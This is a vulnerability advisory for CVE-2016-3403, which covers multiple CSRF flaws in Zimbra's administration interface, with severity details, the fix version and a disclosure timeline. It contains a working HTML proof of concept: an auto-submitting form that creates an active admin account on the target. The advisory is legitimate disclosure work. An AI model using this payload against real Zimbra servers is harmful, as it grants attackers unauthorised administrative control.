CVE-2016-3403 : Multiple CSRF in Zimbra Administration interface

Description

Multiple CSRF vulnerabilities have been found in the administration
interface of Zimbra, giving possibilities like adding, modifying and
removing admin accounts.

Zimbra nicely credited our efforts:

Vulnerability

Every forms in the Administration part of Zimbra are vulnerable to CSRF
because of the lack of a CSRF token identifying a valid session. As a
consequence, requests can be forged and played arbitrarily.

Access Vector: remote

Security Risk: low

Vulnerability: CWE-352

CVSS Base score: 5.8

Proof of Concept

<html>
<body>
<form enctype="text/plain" id="trololo"
action="https://192.168.0.171:7071/service/admin/soap/CreateAccountRequest"
method="POST">
    <input name='<soap:Envelope
xmlns:soap="http://www.w3.org/2003/05/soap-envelope"><soap:Header><context
xmlns="urn:zimbra"><userAgent xmlns="" name="DTC"/><session xmlns=""
id="1337"/><format xmlns=""
type="js"/></context></soap:Header><soap:Body><CreateAccountRequest
xmlns="urn:zimbraAdmin"><name xmlns="">itworks@ubuntu.fr</name><password
xmlns="">test1234</password><a xmlns=""
n="zimbraAccountStatus">active</a><a xmlns=""
n="displayName">ItWorks</a><a xmlns="" n'
        value='"sn">itworks</a><a xmlns=""
n="zimbraIsAdminAccount">TRUE</a></CreateAccountRequest></soap:Body></soap:Envelope>'/>
</form>
<script>
document.forms[0].submit();
</script>
</body>
</html>

Solution

• Upgrade to version 8.7

Affected versions

• All versions previous to 8.7

Fixes

• https://bugzilla.zimbra.com/show_bug.cgi?id=100885
• https://bugzilla.zimbra.com/show_bug.cgi?id=100899

Timeline (dd/mm/yyyy)

• 24/02/2016: Issue reported to Zimbra
• 24/02/2016: Issue aknwoledged

Credits

• Anthony LAOU-HINE TSUEI, Sysdream (laouhine_anthony -at- hotmail
  -dot- fr)
• Damien CAUQUIL, Sysdream (d.cauquil -at- sysdream -dot- com)